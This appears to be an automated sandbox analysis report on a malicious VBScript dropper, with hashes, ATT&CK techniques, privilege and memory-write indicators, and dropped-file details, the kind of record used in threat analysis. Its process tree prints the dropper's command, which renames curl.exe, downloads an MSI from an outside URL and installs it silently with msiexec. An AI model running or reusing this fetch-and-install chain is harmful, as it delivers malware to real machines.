e5fc1512e16a60ad26f7adc427be07d6711f1563236e74c4af0fd89d21a5ec97

Analysis

max time kernel
142s
max time network
271s
platform
windows10-2004_x64
resource
win10v2004-20230831-en
resource tags

arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system
submitted
04/09/2023, 03:21

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

bgraham_u540571.vbs
Size

42KB
MD5

098838a1f9261d3ecb68aa74eaf45ce9
SHA1

2b8005c84ce1e117f84673aa1ce3f855bda223b9
SHA256

e5fc1512e16a60ad26f7adc427be07d6711f1563236e74c4af0fd89d21a5ec97
SHA512

a789a8e187cc1e185d3ddb1c2e286bed5e3be461bef130387ef5d323049f6f0f1247cccd511c14f574d56e94ef04d018674764a26fb34b21c774dc5062a77b92
SSDEEP

768:klSs/NQlQCt9xCt4iDjwq39rpkdZs6CXI+RUgs2Fug+rET+DzAmXO:k8DlQsA2iHQs6CXI+pcrET+YmXO

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
2024	HnVMJmSBX.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of AdjustPrivilegeToken 32 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4856	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4856	msiexec.exe
Token: SeSecurityPrivilege	3084	msiexec.exe
Token: SeCreateTokenPrivilege	4856	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4856	msiexec.exe
Token: SeLockMemoryPrivilege	4856	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4856	msiexec.exe
Token: SeMachineAccountPrivilege	4856	msiexec.exe
Token: SeTcbPrivilege	4856	msiexec.exe
Token: SeSecurityPrivilege	4856	msiexec.exe
Token: SeTakeOwnershipPrivilege	4856	msiexec.exe
Token: SeLoadDriverPrivilege	4856	msiexec.exe
Token: SeSystemProfilePrivilege	4856	msiexec.exe
Token: SeSystemtimePrivilege	4856	msiexec.exe
Token: SeProfSingleProcessPrivilege	4856	msiexec.exe
Token: SeIncBasePriorityPrivilege	4856	msiexec.exe
Token: SeCreatePagefilePrivilege	4856	msiexec.exe
Token: SeCreatePermanentPrivilege	4856	msiexec.exe
Token: SeBackupPrivilege	4856	msiexec.exe
Token: SeRestorePrivilege	4856	msiexec.exe
Token: SeShutdownPrivilege	4856	msiexec.exe
Token: SeDebugPrivilege	4856	msiexec.exe
Token: SeAuditPrivilege	4856	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4856	msiexec.exe
Token: SeChangeNotifyPrivilege	4856	msiexec.exe
Token: SeRemoteShutdownPrivilege	4856	msiexec.exe
Token: SeUndockPrivilege	4856	msiexec.exe
Token: SeSyncAgentPrivilege	4856	msiexec.exe
Token: SeEnableDelegationPrivilege	4856	msiexec.exe
Token: SeManageVolumePrivilege	4856	msiexec.exe
Token: SeImpersonatePrivilege	4856	msiexec.exe
Token: SeCreateGlobalPrivilege	4856	msiexec.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1620 wrote to memory of 3476	1620	WScript.exe	86
PID 1620 wrote to memory of 3476	1620	WScript.exe	86
PID 3476 wrote to memory of 2024	3476	cmd.exe	88
PID 3476 wrote to memory of 2024	3476	cmd.exe	88
PID 3476 wrote to memory of 4856	3476	cmd.exe	90
PID 3476 wrote to memory of 4856	3476	cmd.exe	90

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bgraham_u540571.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1620
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\%USERNAME%\AppData\Local\Temp\ & copy c:\windows\system32\curl.exe HnVMJmSBX.exe & HnVMJmSBX.exe -o aDRQdO.msi https://plano.soulcarelife.org/?5nzumurxizhrb3bpztdybha98e8 & C:\Windows\System32\msiexec.exe /i aDRQdO.msi /qn
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3476
- - C:\Users\Admin\AppData\Local\Temp\HnVMJmSBX.exe
    HnVMJmSBX.exe -o aDRQdO.msi https://plano.soulcarelife.org/?5nzumurxizhrb3bpztdybha98e8
    3⤵
    - Executes dropped EXE
    PID:2024
- - C:\Windows\System32\msiexec.exe
    C:\Windows\System32\msiexec.exe /i aDRQdO.msi /qn
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4856

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3084

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\HnVMJmSBX.exe

Filesize
411KB

MD5
1c3645ebddbe2da6a32a5f9fb43a3c23

SHA1
086f74a35d5afed78ae50cf5586fafffb7845464

SHA256
0ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205

SHA512
ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b

Download Submit
C:\Users\Admin\AppData\Local\Temp\HnVMJmSBX.exe

Filesize
411KB

MD5
1c3645ebddbe2da6a32a5f9fb43a3c23

SHA1
086f74a35d5afed78ae50cf5586fafffb7845464

SHA256
0ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205

SHA512
ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b

Download Submit
C:\Users\Admin\AppData\Local\Temp\aDRQdO.msi

Filesize
1KB

MD5
1fc855a4d4d6bdcd52426c9c1f0f6cf3

SHA1
a2a70924c7917dcddb2cae630acecbc1937456eb

SHA256
ba4d7915a28c524d3c108c8b49cf584085130034df84b7869a23b046723a834f

SHA512
07634fb7c3b63619a75b021c16dcece3d113c723eb73684accac0cd3ee36e4f7ad8a9c985858994ab8a60b765ed932a37a2f3503661bad0c8b2e6f45e9a1533a

Download Submit